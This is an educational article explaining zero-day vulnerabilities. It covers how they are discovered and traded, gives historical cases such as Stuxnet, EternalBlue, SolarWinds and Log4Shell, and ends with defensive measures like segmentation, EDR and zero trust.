A zero-day vulnerability is a software security flaw that is unknown to the software vendor and therefore unpatched. “Zero-day” refers to the number of days the vendor has had to fix it — zero. When such a vulnerability is actively exploited before a patch exists, it’s called a zero-day exploit. These are among the most powerful and dangerous tools in an attacker’s arsenal, capable of compromising fully patched, up-to-date systems.
What Makes Zero-Days Dangerous
The conventional defense against known vulnerabilities is to patch quickly after a CVE is published. Zero-days bypass this defense entirely:
- No patch exists — there’s nothing to apply
- No signatures — AV and IDS tools have no signature for an unknown exploit
- Maximum stealth — exploitation leaves no obvious indicators of compromise
- High value — attackers who discover them keep them secret to maximize use before detection
A zero-day exploit chain — combining multiple zero-days to achieve full system compromise without triggering any alerts — can sell for millions of dollars on the exploit market.
How Zero-Days Are Discovered
Security Researchers (White Hats)
Legitimate security researchers discover zero-days through:
- Fuzzing — automated testing with malformed or random inputs to trigger crashes, which may indicate exploitable conditions
- Code review — manual analysis of source code or binary disassembly
- Reverse engineering — analyzing compiled binaries to find logical flaws
- Variant analysis — after a vulnerability is patched, researchers look for similar patterns elsewhere in the same codebase
Responsible disclosure: most researchers report findings to the vendor, who issues a patch within a coordinated timeline (typically 90 days per Google Project Zero’s policy). After the patch, the vulnerability is published as a CVE (Common Vulnerabilities and Exposures).
Bug Bounty Programs
Companies including Google, Microsoft, Apple, and Meta pay researchers millions for critical zero-days through bug bounty programs:
- Google’s reward for Chrome sandbox escape: up to $250,000
- Apple’s reward for kernel-level iOS zero-days: up to $2,000,000
- Pwn2Own competition: regular prizes of $200,000+ for zero-day demonstrations
Nation-State Intelligence Agencies
Government agencies (NSA, GCHQ, FSB, MSS) maintain teams dedicated to discovering and stockpiling zero-days for offensive cyber operations. The NSA’s TAO (Tailored Access Operations) unit has a catalog of exploits for virtually every major platform.
Underground Exploit Brokers
The commercial zero-day market exists in a legal gray area:
- Zerodium pays up to $2.5M for iOS full-chain remote code execution exploits
- Vulnerability Research firms (Vupen, etc.) sell exploits to government clients
- Dark web markets sell exploits to criminal organizations
A single critical iOS or Android zero-day can sell for $1M+ in this market.
Real-World Zero-Day Examples
Stuxnet (2010) — The First Cyber Weapon
Stuxnet targeted Iranian nuclear facility centrifuges via Siemens PLCs. It exploited four Windows zero-days simultaneously — unprecedented at the time. The worm spread via USB drives, used a stolen legitimate digital certificate for its rootkit driver, and specifically targeted Siemens Step 7 software used to program industrial equipment. It physically destroyed centrifuges by causing them to spin at improper speeds while reporting normal operation.
Widely attributed to the US and Israel’s Operation Olympic Games.
EternalBlue (2017) — NSA Tool Leaked
EternalBlue was an NSA exploit for a zero-day in Windows’ SMBv1 protocol (MS17-010). When the Shadow Brokers hacker group leaked NSA tools, EternalBlue was released publicly. Within weeks:
- WannaCry ransomware used EternalBlue to infect 230,000+ computers in 150 countries in a single day
- NotPetya used EternalBlue combined with credential dumping to devastate Maersk, Merck, FedEx, and dozens of other companies — causing an estimated $10 billion in damages
Microsoft had patched the vulnerability in March 2017, but millions of systems remained unpatched when the attacks occurred in May 2017.
SUNBURST / SolarWinds (2020) — Supply Chain Zero-Day
In one of the most sophisticated attacks in history, Russian intelligence (APT29/Cozy Bear) compromised SolarWinds’ build pipeline and inserted backdoor code into their Orion software update. This was not a traditional CVE vulnerability — it was a supply chain attack that:
- Affected 18,000 organizations that downloaded the malicious update
- Breached US Treasury, State Department, DHS, and dozens of Fortune 500 companies
- Remained undetected for 8–9 months
Log4Shell (CVE-2021-44228) — Zero-Day to Mass Exploitation in Hours
Log4Shell was a critical RCE vulnerability in Apache Log4j (a ubiquitous Java logging library). Within 12 hours of public disclosure, mass exploitation began because:
- Log4j is embedded in thousands of Java applications
- The exploit required only a single line in any logged string
- Public proof-of-concept code appeared within hours
BlackLotus UEFI Bootkit (2023) — Secure Boot Zero-Day
BlackLotus was the first publicly documented UEFI bootkit capable of bypassing Secure Boot on patched Windows 11 systems. It exploited CVE-2022-21894 (Baton Drop) — a vulnerability in the Windows Boot Manager that remained exploitable because the vulnerable binary was still signed by Microsoft.
How Organizations Defend Against Zero-Days
No defense is perfect against a quality zero-day, but layered security reduces the window of exploitation:
Patch management: While zero-days don’t have patches, many “zero-days” are actually n-days — vulnerabilities that have been patched but organizations haven’t applied the patch yet. Rapid patching is the baseline.
Attack Surface Reduction: Disable features you don’t use. If SMBv1 isn’t needed, disable it (as Microsoft recommends). Fewer enabled features = fewer potential zero-day surfaces.
Network Segmentation: Even if one system is compromised via a zero-day, segmentation limits lateral movement. Critical systems should not be reachable from general employee workstations.
Endpoint Detection and Response (EDR): Modern EDR tools like CrowdStrike Falcon, SentinelOne, and Microsoft Defender for Endpoint use behavioral analysis rather than signatures. An exploit exhibiting unusual process behavior (shellcode executing from memory, processes spawning unexpected children) triggers alerts even with no known signature.
Browser Isolation and Application Sandboxing: Run untrusted code (browser, email clients, office documents) inside strict sandboxes. A browser zero-day exploited inside a hardened container limits attacker impact.
Zero Trust Architecture: Verify every access request regardless of network location. Even a system fully compromised via a zero-day faces authentication requirements to access sensitive data on other systems.
The reality is that sophisticated nation-state actors using quality zero-days against targeted organizations is extremely difficult to prevent entirely. The goal is to detect, contain, and respond as rapidly as possible.